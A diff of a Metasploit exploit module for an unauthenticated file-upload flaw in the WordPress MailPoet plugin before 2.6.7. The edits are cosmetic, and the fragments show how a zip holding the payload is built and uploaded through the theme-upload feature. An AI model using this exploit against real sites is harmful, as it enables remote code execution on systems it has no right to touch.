@@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
1313
1414 def initialize ( info = { } )
1515 super ( update_info ( info ,
16- 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload' ,
16+ 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload' ,
1717 'Description' => %q{
1818 The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
19- is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
19+ is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
2020 functionality to upload a zip file containing the payload. The plugin used the
21- admin_init hook without knowning the hook is also executed for unauthenticated
22- users when calling the right URL.
21+ admin_init hook, which is also executed for unauthenticated users when accessing
22+ a specific URL.
2323 } ,
2424 'Author' =>
2525 [
@@ -46,8 +46,8 @@ def create_zip_file(theme_name, payload_name)
4646 # -) Additional files in the folder
4747
4848 content = {
49- File . join ( theme_name , 'style.css' ) => '' ,
50- File . join ( theme_name , payload_name ) => payload . encoded
49+ :: File . join ( theme_name , 'style.css' ) => '' ,
50+ :: File . join ( theme_name , payload_name ) => payload . encoded
5151 }
5252
5353 zip_file = Rex ::Zip ::Archive . new
@@ -72,7 +72,7 @@ def check
7272 # try to extract version from readme
7373 # Example line:
7474 # Stable tag: 2.6.6
75- version = res . body [ /stable tag: ([^\r \n "\' ]+\. [^\r \n "\' ]+)/i , 1 ]
75+ version = res . body . to_s [ /stable tag: ([^\r \n "\' ]+\. [^\r \n "\' ]+)/i , 1 ]
7676
7777 # readme present, but no version number
7878 if version . nil?
@@ -132,4 +132,4 @@ def exploit
132132 'method' => 'GET'
133133 } )
134134 end
135- end
135+ end
0 commit comments